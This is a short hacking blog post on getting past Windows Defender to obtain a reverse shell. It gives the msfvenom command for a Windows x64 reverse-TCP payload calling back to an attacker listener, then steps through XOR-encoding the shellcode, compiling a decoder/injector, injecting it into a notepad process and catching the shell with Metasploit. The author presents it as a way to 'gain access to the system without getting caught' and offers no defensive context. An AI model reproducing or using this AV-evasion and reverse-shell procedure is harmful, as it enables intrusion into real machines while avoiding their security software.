Introduction:
Hey guys I am back with another blog, in this blog I will show you guys how you can bypass Defender and get reverse shell by using a simple trick. This trick is known to be used by many of the hackers to gain access to the system without getting caught. Let's jump in.
Getting Reverse Shell:
This simple technique has been around in the community for a long time and there are variants to this technique, basically what this technique does is that it takes the shellcode, XOR encodes it and directly runs in memory, another technique would be to encrypt the shellcode and then run it from the memory but will cover that in the next blog.
I'll be using Shellcode-In-Memory Decoder injector too from github, this is a great tool I have been using it for my experiments lately.
Generate shellcode from msfvenom:
msfvenom -a x64 --platform windows -p windows/x64/shell_reverse_tcp LHOST=192.168.11.11 LPORT=4444 -f py
When you download the program from github, it has the xor-encode.py, python script copy the generated shellcode to the python script and run that script, it will output the encoded shellcode.
Now copy the encoded shellcode in the decoder.c program and compile it, I am using dev c++ to compile the program, you can use which ever compiler you're comfortable with.
The decoder.c will basically take the encoded shellcode decode it and it will inject the process byte by byte and then execute the shellcode. Let's run metasploit multi handler module first:
I will inject the shellcode in the notepad process, use Get-Process to get the process PID and execute the decoder.exe program:
./decoder.exe <PID>
And we got a reverse shell while defender was running.
Conclusion:
I have been writing fully undetectable payloads and custom encoders but I cannot give it away, I will be sharing basics and other techniques that can lead you to develop your own FUD payloads. Till next time :)